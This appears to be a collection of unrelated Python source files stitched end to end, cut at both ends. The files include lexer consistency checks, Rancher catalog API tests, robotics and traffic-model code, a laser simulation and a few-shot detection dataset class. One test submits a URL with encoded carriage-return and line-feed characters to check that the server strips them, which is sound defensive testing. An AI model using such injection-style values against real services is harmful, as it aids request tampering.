_check_special_incidence_outrun(mode, NotificationDB.error_on_special_pattern_outrun) # (*) Special Patterns shall not have common matches with patterns # of higher precedence. 
if NotificationDB.error_on_special_pattern_subset not in Setup.suppressed_notification_list: _check_higher_priority_matches_subset(mode, NotificationDB.error_on_special_pattern_subset) # (*) Check for dominated patterns if NotificationDB.error_on_dominated_pattern not in Setup.suppressed_notification_list: _check_dominated_pattern(mode, NotificationDB.error_on_dominated_pattern) def _check_special_incidence_outrun(mode, ErrorCode): for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue elif not outrun_checker.do(high.sm, low.sm): continue error.log_consistency_issue(high, low, ExitF=False, ThisComment = "has higher precedence but", ThatComment = "may outrun it", SuppressCode = ErrorCode) def _check_higher_priority_matches_subset(mode, ErrorCode): """Checks whether a higher prioritized pattern matches a common subset of the ReferenceSM. For special patterns of skipper, etc. this would be highly confusing. """ global special_pattern_list for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue if not superset_check.do(high.sm, low.sm): continue error.log_consistency_issue(high, low, ExitF=True, ThisComment = "has higher precedence and", ThatComment = "matches a subset of", SuppressCode = ErrorCode) def _check_dominated_pattern(mode, ErrorCode): for high, low in mode.unique_pattern_pair_iterable(): # 'low' comes after 'high' => 'i' has precedence # Check for domination. if superset_check.do(high, low): error.log_consistency_issue(high, low, ThisComment = "matches a superset of what is matched by", EndComment = "The former has precedence and the latter can never match.", ExitF = True, SuppressCode = ErrorCode) def _check_match_same(mode, ErrorCode): """Special patterns shall never match on some common lexemes.""" for high, low in mode.unique_pattern_pair_iterable(): if high.pattern_string() not in Mode_Prep.focus \ and low.pattern_string() not in Mode_Prep.focus: continue # A superset of B, or B superset of A => there are common matches. if is_disjoint.do(high.sm, low.sm): continue # The 'match what remains' is exempted from check. if high.pattern_string() == "." or low.pattern_string() == ".": continue error.log_consistency_issue(high, low, ThisComment = "matches on some common lexemes as", ThatComment = "", ExitF = True, SuppressCode = ErrorCode) def _check_low_priority_outruns_high_priority_pattern(mode): """Warn when low priority patterns may outrun high priority patterns. Assume that the pattern list is sorted by priority! """ for high, low in mode.unique_pattern_pair_iterable(): if outrun_checker.do(high.sm, low.sm): error.log_consistency_issue(low, high, ExitF=False, ThisComment="may outrun") def initial_mode(ModePrepList, initial_mode): # (*) Start mode specified? mode_name_list, \ implemented_mode_name_list = _get_mode_name_lists(ModePrepList) """If more then one mode is defined, then that requires an explicit definition 'start = mode'. """ assert implemented_mode_name_list assert blackboard.initial_mode is not None mode = initial_mode.get_text() # Start mode present and applicable? error.verify_word_in_list(mode, mode_name_list, "Start mode '%s' is not defined." % mode, blackboard.initial_mode.sr) error.verify_word_in_list(mode, implemented_mode_name_list, "Start mode '%s' is inheritable only and cannot be instantiated." 
% mode, initial_mode.sr) def __access_mode(Mode, ModePrepList, OtherModeName, ModeNameList, EntryF): type_str = { True: "entry from", False: "exit to" }[EntryF] error.verify_word_in_list(OtherModeName, ModeNameList, "Mode '%s' permits the %s mode '%s'\nbut no such mode exists." % \ (Mode.name, type_str, OtherModeName), Mode.sr) for mode in ModePrepList: if mode.name == OtherModeName: return mode # OtherModeName MUST be in ModePrepList, at this point in time. assert False def __error_transition(Mode, OtherMode, EntryF): type_str = { True: "entry", False: "exit" }[EntryF] type0_str = { True: "entry from", False: "exit to" }[EntryF] type1_str = { True: "exit to", False: "entry from" }[EntryF] error.log("Mode '%s' permits the %s mode '%s' but mode '%s' does not" % (Mode.name, type0_str, OtherMode.name, OtherMode.name), Mode.sr, DontExitF=True) error.log("permit the %s mode '%s' or any of its base modes." % (type1_str, Mode.name), OtherMode.sr, DontExitF=True) error.log("May be, use explicitly mode tag '<%s: ...>' for restriction." % type_str, Mode.sr) def __exit_transitions(mode, ModePrepList, mode_name_list): for exit_mode_name in mode.exit_mode_name_list: exit_mode = __access_mode(mode, ModePrepList, exit_mode_name, mode_name_list, EntryF=False) # Check if this mode or one of the base modes can enter for base_mode in mode.base_mode_sequence: if base_mode.name in exit_mode.entry_mode_name_list: break else: __error_transition(mode, exit_mode, EntryF=False) def __entry_transitions(mode, ModePrepList, mode_name_list): for entry_mode_name in mode.entry_mode_name_list: entry_mode = __access_mode(mode, ModePrepList, entry_mode_name, mode_name_list, EntryF=True) # Check if this mode or one of the base modes can be reached for base_mode in mode.base_mode_sequence: if base_mode.name in entry_mode.exit_mode_name_list: break else: __error_transition(mode, entry_mode, EntryF=True) def _check_on_bad_lexatom_handler_implemented(ModePrepList): bad_mode_name_list = [ mode.name for mode in ModePrepList if E_IncidenceIDs.BAD_LEXATOM not in mode.incidence_db ] if not bad_mode_name_list: return lexatom_range = Setup.lexatom.type_range modes_str = ", ".join(name for name in bad_mode_name_list) mode = ModePrepList[0] error.warning("Missing 'on_bad_lexatom' handler in mode(s) %s.\n" \ % modes_str + \ "The range of values in buffer elements is [%i:%i].\n" \ % (lexatom_range.begin, lexatom_range.end-1) + \ "Not all of those contain representations in the buffer's encoding '%s'." 
% Setup.buffer_encoding.name, mode.sr, SuppressCode=NotificationDB.warning_codec_error_with_non_unicode) def _check_token_repetition_enabled(mode, token_db): if mode.loopers.indentation_handler: if not token_db.support_repetition(): error.warning("Option 'indentation' defined token repetition is not supported.\n" \ "May be: * Define 'token { DEDENT \\repeatable; }'.\n" " * And, if token type is customized, define 'repetition_n = member-name'.", mode.sr) elif "DEDENT" not in token_db.token_repetition_token_id_list: error.warning("Option 'indentation' defined, but 'DEDENT' is not marked as repeatable.\n" \ "Define 'token { DEDENT \\repeatable; }'.\n", mode.sr) def _get_mode_name_lists(ModePrepList): mode_name_list = sorted([mode.name for mode in ModePrepList]) # Applicable modes can only be determined after possible addition of "inheritable: only" implemented_mode_name_list = sorted([mode.name for mode in ModePrepList if mode.option_db.value("inheritable") != "only"]) return mode_name_list, implemented_mode_name_list import pytest import time from rancher import ApiError from .common import wait_for_template_to_be_created, \ wait_for_template_to_be_deleted, random_str from .conftest import set_server_version def test_catalog(admin_mc): client = admin_mc.client name1 = random_str() name2 = random_str() url = "https://github.com/StrongMonkey/charts-1.git" catalog1 = client.create_catalog(name=name1, branch="test", url=url, ) catalog2 = client.create_catalog(name=name2, branch="test", url=url, ) wait_for_template_to_be_created(client, name1) wait_for_template_to_be_created(client, name2) client.delete(catalog1) client.delete(catalog2) wait_for_template_to_be_deleted(client, name1) wait_for_template_to_be_deleted(client, name2) def test_invalid_catalog(admin_mc, remove_resource): client = admin_mc.client name = random_str() bad_url = "git://github.com/StrongMonkey/charts-1.git" # POST: Bad URL with pytest.raises(ApiError) as e: catalog = client.create_catalog(name=name, branch="test", url=bad_url, ) remove_resource(catalog) assert e.value.error.status == 422 # POST: No URL with pytest.raises(ApiError) as e: catalog = client.create_catalog(name=name, branch="test", url="", ) remove_resource(catalog) assert e.value.error.status == 422 # PUT: Bad URL good_url = "https://github.com/StrongMonkey/charts-1.git" catalog = client.create_catalog(name=name, branch="test", url=good_url, ) remove_resource(catalog) wait_for_template_to_be_created(client, name) with pytest.raises(ApiError) as e: catalog.url = bad_url client.update_by_id_catalog(catalog.id, catalog) assert e.value.error.status == 422 def test_invalid_catalog_chars(admin_mc, remove_resource): client = admin_mc.client name = random_str() url = "https://github.com/%0dStrongMonkey%0A/charts-1.git" catalog = client.create_catalog(name=name, branch="test", url=url, ) remove_resource(catalog) wait_for_template_to_be_created(client, name) catalog = client.reload(catalog) correct_url = "https://github.com/StrongMonkey/charts-1.git" assert catalog['url'] == correct_url def test_global_catalog_template_access(admin_mc, user_factory, remove_resource): client = admin_mc.client user1 = user_factory() remove_resource(user1) name = random_str() # Get all templates from library catalog that is enabled by default updated = False start = time.time() interval = 0.5 while not updated: time.sleep(interval) interval *= 2 c = client.list_catalog(name="library").data[0] if c.transitioning == "no": updated = True continue if time.time() - start > 90: raise 
AssertionError( "Timed out waiting for catalog to stop transitioning") existing = client.list_template(catalogId="library").data templates = [] for t in existing: templates.append("library-"+t.name) url = "https://github.com/mrajashree/charts.git" catalog = client.create_catalog(name=name, branch="onlyOne", url=url, ) wait_for_template_to_be_created(client, name) updated = False start = time.time() interval = 0.5 while not updated: time.sleep(interval) interval *= 2 c = client.list_catalog(name=name).data[0] if c.transitioning == "no": updated = True continue if time.time() - start > 90: raise AssertionError( "Timed out waiting for catalog to stop transitioning") # Now list all templates of this catalog new_templates = client.list_template(catalogId=name).data for t in new_templates: templates.append(name+"-"+t.name) all_templates = existing + new_templates # User should be able to list all these templates user_client = user1.client user_lib_templates = user_client.list_template(catalogId="library").data user_new_templates = user_client.list_template(catalogId=name).data user_templates = user_lib_templates + user_new_templates assert len(user_templates) == len(all_templates) client.delete(catalog) wait_for_template_to_be_deleted(client, name) def test_user_can_list_global_catalog(user_factory, remove_resource): user1 = user_factory() remove_resource(user1) user_client = user1.client c = user_client.list_catalog(name="library") assert len(c) == 1 @pytest.mark.nonparallel def test_template_version_links(admin_mc, admin_pc, custom_catalog, remove_resource, restore_rancher_version): """Test that template versionLinks are being updated based off the rancher version set on the server and the query paramater 'rancherVersion' being set. """ # 1.6.0 uses 2.0.0-2.2.0 # 1.6.2 uses 2.1.0-2.3.0 client = admin_mc.client c_name = random_str() custom_catalog(name=c_name) # Set the server expecting both versions set_server_version(client, "2.1.0") templates = client.list_template( rancherVersion='2.1.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 2 assert '1.6.0' in templates.data[0]['versionLinks'] assert '1.6.2' in templates.data[0]['versionLinks'] # Set the server expecting only the older version set_server_version(client, "2.0.0") templates = client.list_template( rancherVersion='2.0.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 1 assert '1.6.0' in templates.data[0]['versionLinks'] # Set the server expecting only the newer version set_server_version(client, "2.3.0") templates = client.list_template( rancherVersion='2.3.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 1 assert '1.6.2' in templates.data[0]['versionLinks'] # Set the server expecting no versions, this should be outside both # versions acceptable ranges set_server_version(client, "2.4.0") templates = client.list_template( rancherVersion='2.4.0', catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 0 # If no rancher version is set get back both versions templates = client.list_template(catalogId=c_name) assert len(templates.data[0]['versionLinks']) == 2 assert '1.6.0' in templates.data[0]['versionLinks'] assert '1.6.2' in templates.data[0]['versionLinks'] demos/demo_trifinger_platform_log.py #!/usr/bin/env python3 """Demo showing how to use TriFingerPlatformLog.""" import argparse import cv2 import robot_fingers import trifinger_cameras # noqa -- needed for camera observation from trifinger_cameras import utils def main(): parser = argparse.ArgumentParser() 
parser.add_argument("robot_log", type=str, help="Robot log file") parser.add_argument("camera_log", type=str, help="Camera log file") args = parser.parse_args() log = robot_fingers.TriFingerPlatformLog(args.robot_log, args.camera_log) # iterate over all robot time steps in the log for t in range(log.get_first_timeindex(), log.get_last_timeindex() + 1): # TriFingerPlatformLog provides the same getters as # TriFingerPlatformFrontend: robot_observation = log.get_robot_observation(t) # print position of the first finger print(robot_observation.position[:3]) # show images of camera180 try: camera_observation = log.get_camera_observation(t) cv2.imshow( "camera180", utils.convert_image(camera_observation.cameras[1].image), ) cv2.waitKey(1) except Exception as e: print(e) if __name__ == "__main__": main() LaudateCorpus1/caladriustraffic_provider/predicted_traffic.py import datetime as dt import logging import pandas as pd from typing import Any, Dict from caladrius.traffic_provider.trafficprovider import TrafficProvider from caladrius.graph.gremlin.client import GremlinClient from caladrius.metrics.heron.client import HeronMetricsClient from caladrius.model.traffic.heron.base import HeronTrafficModel from caladrius.model.traffic.heron.prophet import ProphetTrafficModel from model.topology.heron.helpers import convert_throughput_to_inter_arr_times LOG: logging.Logger = logging.getLogger(__name__) class PredictedTraffic(TrafficProvider): """ This module takes in user-provided information and uses it to create a HeronTraffic Model that can be used to predict and supply arrival rate information about traffic in future. """ def __init__(self, metrics_client: HeronMetricsClient, graph_client: GremlinClient, topology_id: str, cluster: str, environ: str, start: [dt.datetime], end: [dt.datetime], traffic_config: Dict[str, Any], **other_kwargs) -> None: self.topology_id = topology_id self.cluster = cluster self.environ = environ self.start = start self.end = end self.kwargs = other_kwargs self.graph_client: GremlinClient = graph_client self.metrics_client: HeronMetricsClient = metrics_client self.arrival_rate = None self.inter_arrival_time = None self.tuple_arrival = None model: HeronTrafficModel = ProphetTrafficModel(traffic_config, self.metrics_client, self.graph_client) # this data structure contains data received per instance per second self.prediction_results = model.predict_traffic(topology_id, cluster, environ, **other_kwargs) def tuple_arrivals(self): """This function returns the number of tuples arrived at an instance in a minute""" # Note that these are tuple arrival values for future cases and predictions themselves. # we shouldn't use them to validate queue sizes. 
if self.arrival_rate is None: self.arrival_rates() self.tuple_arrival = self.arrival_rate.copy() # the following converts the data back to tuple arrivals per minute self.tuple_arrival['num-tuples'] = self.arrival_rate['mean_arrival_rate'] * 60 * 1000 self.tuple_arrival.drop(["mean_arrival_rate"], axis=1) return self.tuple_arrival def arrival_rates(self) -> pd.DataFrame: """This function returns the number of tuples arrived at an instance per ms""" df: pd.DataFrame = pd.DataFrame(columns=['task', 'mean_arrival_rate']) # this function returns arrival rates as number of tuples that arrive per millisecond # as prediction_results data is in seconds, we need to divide to get data for millseconds # format --> task mean_arrival_rate mean_rates = self.prediction_results["instances"]["mean"] for task, rates in mean_rates.items(): data_across_streams = 0 for _, value in rates.items(): data_across_streams = data_across_streams + value df = df.append({'task': task, 'mean_arrival_rate': data_across_streams / 1000}, ignore_index=True) self.arrival_rate = df return df def inter_arrival_times(self): """This function returns the time between the arrival of two subsequent tuples in ms""" # this function returns arrival times between two subsequent tuples in ms # task mean_inter_arrival_time std_inter_arrival_time if self.inter_arrival_time is None: if self.tuple_arrival is None: self.tuple_arrivals() self.inter_arrival_time = convert_throughput_to_inter_arr_times(self.tuple_arrival) return self.inter_arrival_time def service_times(self): """TODO: Also predict service times for all components!""" bolt_service_times = self.metrics_client.get_service_times(self.topology_id, self.cluster, self.environ, self.start, self.end, **self.kwargs) # Drop the system streams if bolt_service_times.empty: raise Exception("Service times for the topology's bolts are unavailable") bolt_service_times.drop(["component", "stream"], axis=1, inplace=True) return bolt_service_times # Copyright 2011 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
class MethodConcept(object):
    from com.sun.star.beans.MethodConcept import ALL, PROPERTY


class PropertyConcept(object):
    from com.sun.star.beans.PropertyConcept import ALL, PROPERTYSET, ATTRIBUTES, METHODS


class FieldAccessMode(object):
    from com.sun.star.reflection.FieldAccessMode import READWRITE, READONLY, WRITEONLY
    modes = {READONLY.value: '[Read Only]',
             #READWRITE.value: '[ReadWrite]',
             READWRITE.value: '',
             WRITEONLY.value: '[WriteOnly]'}


class ParamMode(object):
    from com.sun.star.reflection.ParamMode import IN, OUT, INOUT
    modes = {IN.value: '[in]', OUT.value: '[out]', INOUT.value: '[inout]'}


class PropertyAttribute(object):
    from com.sun.star.beans.PropertyAttribute import \
        MAYBEVOID, BOUND, CONSTRAINED, TRANSIENT, READONLY, \
        MAYBEAMBIGUOUS, MAYBEDEFAULT, REMOVEABLE, OPTIONAL
    modes = {MAYBEVOID: 'Maybevoid', BOUND: 'Bound', CONSTRAINED: 'Constrained',
             TRANSIENT: 'Transient', READONLY: 'Read_Only',
             MAYBEAMBIGUOUS: 'Maybeambiguous', MAYBEDEFAULT: 'Maybedefault',
             REMOVEABLE: 'Removeable', OPTIONAL: 'Optional'}


class TypeClass(object):
    from com.sun.star.uno.TypeClass import \
        SEQUENCE, ARRAY, VOID, BYTE, SHORT, UNSIGNED_SHORT, \
        LONG, UNSIGNED_LONG, HYPER, UNSIGNED_HYPER, FLOAT, \
        DOUBLE, BOOLEAN, CHAR, STRING, STRUCT, INTERFACE, \
        TYPE, ANY, ENUM, EXCEPTION


class TypeClassGroups(object):
    INT = [TypeClass.SHORT, TypeClass.UNSIGNED_SHORT, TypeClass.LONG,
           TypeClass.UNSIGNED_LONG, TypeClass.HYPER, TypeClass.UNSIGNED_HYPER]
    FLOATING = [TypeClass.FLOAT, TypeClass.DOUBLE]
    NUMERIC = INT + FLOATING
    STR = TypeClass.STRING
    SEQ = [TypeClass.SEQUENCE, TypeClass.ARRAY]
    OBJECT = TypeClass.INTERFACE
    STRUCTS = (TypeClass.STRUCT, TypeClass.EXCEPTION)
    COMPATIBLE = NUMERIC + [
        TypeClass.STRING, TypeClass.BOOLEAN, TypeClass.ENUM,
        TypeClass.INTERFACE, TypeClass.STRUCT, TypeClass.TYPE]
    ALL = {getattr(TypeClass, k).value: getattr(TypeClass, k)
           for k in dir(TypeClass) if hasattr(getattr(TypeClass, k), 'value')}

    @classmethod
    def get_type_class(cls, type_name):
        return cls.ALL.get(type_name.upper(), None)


"""
Downloading Google Forms Data.

Collect a list of email addresses from a Google spreadsheet.
"""
import ezsheets

ss = ezsheets.Spreadsheet('SPREADSHEET')  # use your Google form spreadsheet ID here

# Get the Google spreadsheet, and rows
sheet = ss[0]
rows = sheet.getRows()
print(rows)

# Get the 3rd column, that contains the emails
columnThree = sheet.getColumn(3)
print(columnThree)

# if the cell is empty, or it says "Email" meaning it is the title column,
# skip to the next cell in the column, else, print the email
for i in columnThree:
    if i == '' or i == 'Email':
        continue
    else:
        print(i)


#!/usr/bin/python -tt
def Mul3or5(max):
    '''
    Mul3or5 - If we list all the natural numbers below 10 that are multiples of 3 or 5,
    we get 3, 5, 6 and 9. The sum of these multiples is 23.
    Find the sum of all the multiples of 3 or 5 below 1000.
    '''
    sum = 0
    for i in range(1, max):
        if (i % 3 == 0) or (i % 5 == 0):
            sum += i
    return 'sum of all the multiples of 3 or 5 below ' + str(max) + ' is ' + str(sum)


if __name__ == '__main__':
    print('Problem 0001: ' + Mul3or5(1000))


import sys
from os.path import join, abspath, dirname, isdir, isfile

sys.path.append(join('..'))
sys.path.append(join('..', 'lisdf'))
sys.path.append(join('..', 'pddlstream'))
sys.path.append(join('..', 'pybullet_planning'))

import warnings
warnings.filterwarnings('ignore')

ASSET_PATH = join(dirname(__file__), '..', 'assets')
EXP_PATH = join(dirname(__file__), '..', 'test_cases')
# -*- coding: utf-8 -*-
"""
Model of a passively mode-locked laser.
@author: """ # ignore warning 'line break after binary operator' # as line break *before* binary operator *also* creates a warning ... # flake8: noqa: W504 import numpy as np from scipy.optimize import brentq from ..root import CT_LTI_System, CT_System class Laser(CT_System): """A class to simulate lasers with a (slow) saturable absorber in the cavity. While it is intended for mode-locked lasers, it may also be useful for Q-switched lasers.""" def __init__(self, loss, TR, tauL, etaP, EsatL, DR, EsatA, Toc, PP0=0., P0=None, g0=None): self.loss = loss self.TR = TR self.tauL = tauL self.etaP = etaP self.EsatL = EsatL self.DR = DR self.EsatA = EsatA self.Toc = Toc # self.PP0 = PP0 # self.PP = PP0 if P0 is None: P0 = self.Psteady(PP0) if g0 is None: g0 = self.gsteady(PP0) self.g0 = g0 super().__init__(self.f, self.g, 2, (1, 1), s0=np.matrix([[P0], [g0]])) def qP(self, EP): S = EP / self.EsatA res = np.where(S == 0, self.DR, self.DR / S * (1. - np.exp(-S))) if res.shape == (1,): res = res[0] return(res) def dqP_dEP(self, EP): EsatA = self.EsatA S = EP / EsatA if S == 0: return(self.DR / self.EsatA) else: return(self.DR / EP * (np.exp(-S) - 1. / S + np.exp(-S) / S)) def Pdot(self, P, g): P = np.array(P) g = np.array(g) EP = P * self.TR return(np.where(P != 0, (g - self.loss - self.qP(EP)) / self.TR * P, np.zeros(P.shape))) def gdot(self, P, g, PP): spontaneous = (self.g0 - g) / self.tauL stimulated = -P * g / self.EsatL pump = self.etaP * PP / self.EsatL return(spontaneous + stimulated + pump) def f(self, t, s, u): P, g = s PP = u sdot = np.matrix([self.Pdot(P, g), self.gdot(P, g, PP)]) return sdot def grad_f(self, t, s): P, g = s loss = self.loss TR = self.TR EP = P * TR qP = self.qP(EP) EsatL = self.EsatL tauL = self.tauL dfP_dP = (g - loss - qP) / TR - EP * self.dqP_dEP(EP) dfP_dg = P / TR dfg_dP = g / EsatL dfg_dg = -1 / tauL - P / EsatL return([[dfP_dP, dfP_dg], [dfg_dP, dfg_dg]]) def g(self, t, s, u): """ This is the output function of the CT_System and returns the output power of the laser. Despite its name, is *not* related to the laser's gain! """ P, g = s return np.matrix([self.Toc * P]) @property def pumpThreshold(self): """Pump power threshold, i.e., pump power needed to start lasing""" EsatL, tauL, etaP = self.EsatL, self.tauL, self.etaP loss, DR = self.loss, self.DR return(EsatL / tauL * (loss + DR) / etaP) def steadystate(self, Ppump): """Steady state (Psteady, gsteady) given pump power Ppump""" # if Ppump is None: # Ppump = self.PP EsatL, TR, tauL = self.EsatL, self.TR, self.tauL loss, DR, etaP = self.loss, self.DR, self.etaP PPthreshold = self.pumpThreshold if Ppump <= PPthreshold: Psteady = 0. gsteady = etaP * Ppump * tauL / EsatL else: # 1. determine boundaries for Psteady: # 2. Apply root-finder (brentq) given boundaries offs = EsatL / tauL # assume non-linear losses (qP(EP)) = 0: upperBound = -offs + Ppump * etaP / loss # assume max. non-linear losses (qP(EP) = DR): lowerBound = -offs + Ppump * etaP / (loss + DR) Psteady = brentq(lambda P: -P - EsatL / tauL + etaP * Ppump / (loss + self.qP(P * TR)), lowerBound, upperBound) gsteady = loss + self.qP(Psteady * TR) return(Psteady, gsteady) def Psteady(self, Ppump): """Steady-state intracavity power given pump power Ppump""" return(self.steadystate(Ppump)[0]) def gsteady(self, Ppump): """Steady-state gain given pump power Ppump""" return(self.steadystate(Ppump)[1]) def w0(self, Ppump): """Returns natural angular frequency of disturbances around steady state. 
Steady state is determined from pump power Ppump.""" EsatL, TR, tauL = self.EsatL, self.TR, self.tauL Pst, gst = self.steadystate(Ppump) r = Pst / EsatL w0 = np.sqrt(r * gst / TR + Pst * self.dqP_dEP(Pst * TR) * (1. / tauL + r)) return(w0) def alpha(self, Ppump): """Damping rate of relaxation oscillations (negative real part of poles). The nice thing about alpha is that it is also correct below the lasing threshold (where it is equal to 1 / tauL).""" EsatL, TR, tauL = self.EsatL, self.TR, self.tauL Pst, gst = self.steadystate(Ppump) a = (1. / tauL + Pst * (self.dqP_dEP(Pst * TR) + 1. / EsatL)) return(a) def zeta(self, Ppump): """Damping ratio of relaxation oscillations.""" return(self.alpha(Ppump) / 2. / self.w0(Ppump)) def rho(self, Ppump): """Internal slope efficiency at pump power Ppump""" etaP, EsatL, TR = self.etaP, self.EsatL, self.TR return(self.Psteady(Ppump) * etaP / (EsatL * TR * self.w0(Ppump)**2)) @property def stable(self): """Return true if laser is stable (i.e. no Q-switching)""" return(self.zeta > 0) def approximateLTI(self, Ppump): """Linearizes the state-equations around the steady state corresponding to a pump power Ppump and returns a CT_LTI_System.""" w0 = self.w0(Ppump) zeta = self.zeta(Ppump) rho = self.rho(Ppump) Toc = self.Toc Pst = self.Psteady(Ppump) TR = self.TR dqPdEP = self.dqP_dEP(self.TR * Pst) M = np.matrix([[-Pst * dqPdEP / w0, Pst / TR / w0], [1, 0]]) A = np.matrix([[-2. * w0 * zeta, -w0], [w0, 0.]]) B = np.matrix([[w0 * rho], [0.]]) C = np.matrix([[0., Toc]]) D = np.matrix([[0.]]) return(M, CT_LTI_System(A, B, C, D)) class NdYVO4Laser(Laser): """An pre-configured example of a passively mode-locked 100 MHz Nd:YVO4 Laser""" def __init__(self, Ppump=0.): tauL = 90e-6 TR = 10e-9 FsatA = 60e-6 / 1e-4 wA = 140e-6 DR = 1.7e-2 loss = 9e-2 + 1.3e-2 wavelength = 1064e-9 sigmaEm = 114e-20 * 1e-4 wL = 62e-6 etaP = 808. / 1064. Toc = 8.7e-2 c = 3e8 h = 6.626e-34 nuL = c / wavelength EsatL = np.pi * wL**2 * h * nuL / (2 * sigmaEm) EsatA = FsatA * np.pi * wA**2 Laser.__init__(self, loss, TR, tauL, etaP, EsatL, DR, EsatA, Toc, Ppump, P0=None, g0=None) mmfewshot/detection/datasets/base.py # Copyright (c) OpenMMLab. All rights reserved. import copy import json import os.path as osp import warnings from typing import Dict, List, Optional, Sequence, Union import numpy as np from mmdet.datasets.builder import DATASETS from mmdet.datasets.custom import CustomDataset from mmdet.datasets.pipelines import Compose from terminaltables import AsciiTable from mmfewshot.utils import get_root_logger from .utils import NumpyEncoder @DATASETS.register_module() class BaseFewShotDataset(CustomDataset): """Base dataset for few shot detection. The main differences with normal detection dataset fall in two aspects. - It allows to specify single (used in normal dataset) or multiple (used in query-support dataset) pipelines for data processing. - It supports to control the maximum number of instances of each class when loading the annotation file. The annotation format is shown as follows. The `ann` field is optional for testing. .. code-block:: none [ { 'id': '0000001' 'filename': 'a.jpg', 'width': 1280, 'height': 720, 'ann': { 'bboxes': (n, 4) in (x1, y1, x2, y2) order. 'labels': (n, ), 'bboxes_ignore': (k, 4), (optional field) 'labels_ignore': (k, 4) (optional field) } }, ... ] Args: ann_cfg (list[dict]): Annotation config support two type of config. - loading annotation from common ann_file of dataset with or without specific classes. 
example:dict(type='ann_file', ann_file='path/to/ann_file', ann_classes=['dog', 'cat']) - loading annotation from a json file saved by dataset. example:dict(type='saved_dataset', ann_file='path/to/ann_file') classes (str | Sequence[str] | None): Classes for model training and provide fixed label for each class. pipeline (list[dict] | None): Config to specify processing pipeline. Used in normal dataset. Default: None. multi_pipelines (dict[list[dict]]): Config to specify data pipelines for corresponding data flow. For example, query and support data can be processed with two different pipelines, the dict should contain two keys like: - query (list[dict]): Config for query-data process pipeline. - support (list[dict]): Config for support-data process pipeline. data_root (str | None): Data root for ``ann_cfg``, `img_prefix``, ``seg_prefix``, ``proposal_file`` if specified. Default: None. test_mode (bool): If set True, annotation will not be loaded. Default: False. filter_empty_gt (bool): If set true, images without bounding boxes of the dataset's classes will be filtered out. This option only works when `test_mode=False`, i.e., we never filter images during tests. Default: True. min_bbox_size (int | float | None): The minimum size of bounding boxes in the images. If the size of a bounding box is less than ``min_bbox_size``, it would be added to ignored field. Default: None. ann_shot_filter (dict | None): Used to specify the class and the corresponding maximum number of instances when loading the annotation file. For example: {'dog': 10, 'person': 5}. If set it as None, all annotation from ann file would be loaded. Default: None. instance_wise (bool): If set true, `self.data_infos` would change to instance-wise, which means if the annotation of single image has more than one instance, the annotation would be split to num_instances items. Often used in support datasets, Default: False. dataset_name (str | None): Name of dataset to display. For example: 'train_dataset' or 'query_dataset'. Default: None. """ CLASSES = None def __init__(self, ann_cfg: List[Dict], classes: Union[str, Sequence[str], None], pipeline: Optional[List[Dict]] = None, multi_pipelines: Optional[Dict[str, List[Dict]]] = None, data_root: Optional[str] = None, img_prefix: str = '', seg_prefix: Optional[str] = None, proposal_file: Optional[str] = None, test_mode: bool = False, filter_empty_gt: bool = True, min_bbox_size: Optional[Union[int, float]] = None, ann_shot_filter: Optional[Dict] = None, instance_wise: bool = False, dataset_name: Optional[str] = None) -> None: self.data_root = data_root self.img_prefix = img_prefix self.seg_prefix = seg_prefix self.proposal_file = proposal_file self.test_mode = test_mode self.filter_empty_gt = filter_empty_gt if classes is not None: self.CLASSES = self.get_classes(classes) self.instance_wise = instance_wise # set dataset name if dataset_name is None: self.dataset_name = 'Test dataset' \ if test_mode else 'Train dataset' else: self.dataset_name = dataset_name # join paths if data_root is specified if self.data_root is not None: if not (self.img_prefix is None or osp.isabs(self.img_prefix)): self.img_prefix = osp.join(self.data_root, self.img_prefix) if not (self.proposal_file is None or osp.isabs(self.proposal_file)): self.proposal_file = osp.join(self.data_root, self.proposal_file) self.ann_cfg = copy.deepcopy(ann_cfg) self.data_infos = self.ann_cfg_parser(ann_cfg) assert self.data_infos is not None, \ f'{self.dataset_name} : none annotation loaded.' 
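# ann_cfg entries take one of the two forms shown in the class docstring, e.g.
#   dict(type='ann_file', ann_file='path/to/ann_file', ann_classes=['dog', 'cat'])
#   dict(type='saved_dataset', ann_file='path/to/ann_file')
# ann_cfg_parser() joins data_root onto relative ann_file paths and loads them
# into data_infos before any of the filtering below.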
# load proposal file if self.proposal_file is not None: self.proposals = self.load_proposals(self.proposal_file) else: self.proposals = None # filter images too small and containing no annotations if not test_mode: # filter bbox smaller than the min_bbox_size if min_bbox_size: self.data_infos = self._filter_bboxs(min_bbox_size) # filter images valid_inds = self._filter_imgs() self.data_infos = [self.data_infos[i] for i in valid_inds] if self.proposals is not None: self.proposals = [self.proposals[i] for i in valid_inds] # filter annotations by ann_shot_filter if ann_shot_filter is not None: if isinstance(ann_shot_filter, dict): for class_name in list(ann_shot_filter.keys()): assert class_name in self.CLASSES, \ f'{self.dataset_name} : class ' \ f'{class_name} in ann_shot_filter not in CLASSES.' else: raise TypeError('ann_shot_filter only support dict') self.ann_shot_filter = ann_shot_filter self.data_infos = self._filter_annotations( self.data_infos, self.ann_shot_filter) # instance_wise will make each data info only contain one # annotation otherwise all annotation from same image will # be checked and merged. if self.instance_wise: instance_wise_data_infos = [] for data_info in self.data_infos: num_instance = data_info['ann']['labels'].size # split annotations if num_instance > 1: for i in range(data_info['ann']['labels'].size): tmp_data_info = copy.deepcopy(data_info) tmp_data_info['ann']['labels'] = np.expand_dims( data_info['ann']['labels'][i], axis=0) tmp_data_info['ann']['bboxes'] = np.expand_dims( data_info['ann']['bboxes'][i, :], axis=0) instance_wise_data_infos.append(tmp_data_info) else: instance_wise_data_infos.append(data_info) self.data_infos = instance_wise_data_infos # merge different annotations with the same image else: merge_data_dict = {} for i, data_info in enumerate(self.data_infos): # merge data_info with the same image id if merge_data_dict.get(data_info['id'], None) is None: 